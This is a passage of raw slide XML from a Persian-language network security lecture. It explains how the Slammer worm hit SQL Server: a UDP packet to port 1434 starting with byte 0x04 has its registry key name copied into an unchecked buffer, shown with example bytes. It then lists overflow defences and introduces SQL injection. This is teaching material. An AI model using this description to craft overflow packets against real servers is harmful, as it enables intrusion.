            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>مشکلي که در توليد کننده اعداد تصادفي وجود داشت باعث شد که کرم </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Slammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> همه کامپيوترها را تحت تاثير قرار ندهد (دو بيت آخر اولين آدرس هرگز تغيير نميکرد)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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74638"/>
            <a:ext cx="8229600" cy="796925"/>
          </a:xfrm>
          <a:no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fa-IR" smtClean="0"/>
              <a:t>محل نفوذ در SQL Server</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="7772400" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>اگر بسته هاي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> به پورت 1434</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> برسند و اولين بايت آنها </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> باشد، باقيمانده بسته به عنوان يک کليد رجيستري که بايد باز شود (در واقع سعي ميکند اين کليد را باز کند) تفسير ميشود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>به عنوان مثال با ارسال </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>\x04\x41\x41\x41\x41</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> (کد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> که بعد از آن چهار حرف </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>‘A’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> آمده است)، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> فرض مي کند که بايستي کليد رجيستري زير را باز کند:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HKLM\Software\Microsoft\Microsoft SQL Server\AAAA\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>MSSQLServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>اسم کليد رجيستري (که در ادامه بسته آمده) در </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ذخيره ميشود تا بتوان بعداًٌ از آن استفاده کرد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>محدوده آرايه چک نميشود، بنابراين اگر طول رشته زياد باشد، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> اتفاق مي افتد و ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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571500" y="0"/>
            <a:ext cx="8077200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>روش هاي کشف و جلوگيري از </a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1371600"/>
            <a:ext cx="7772400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>بازرسي تمام کدها کار سخت و وقت گيري است و بسياري از نقاط آسيب پذيري پيدا نميشوند! (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>حدود 5 ميليون خط کد دارد)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>تعداد زيادي ابزار آناليز کد وجود دارد که از الگوريتم هاي اثبات شده براي کشف استفاده ميکنند، تعداد زيادي از نقاط آسيب پذير را پيدا ميکنند، ولي نه همه آنها را!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>پشته را به صورت غير اجرايي در بياوريم (البته جلوي همه حمله ها را نمي گيرد)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>در کد کمپايل شده تمهيداتي براي کشف و جلوگيري از سرريز اضافه کنيم.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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6477000" cy="685800"/>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fa-IR" smtClean="0"/>
              <a:t>فهرست مطالب</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>سرريز بافر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Buffer Overflow)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>تزريق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(SQL Injection)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>شنود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Sniffing)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>جعل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Spoofing)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>پيوست 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>پيوست 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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295400" y="228600"/>
            <a:ext cx="72390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1" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2800" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> چيست؟ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8229600" cy="48307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Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL stands for </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Structured Query Language</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Allows us to access a database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ANSI and ISO standard computer language </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL can: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noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
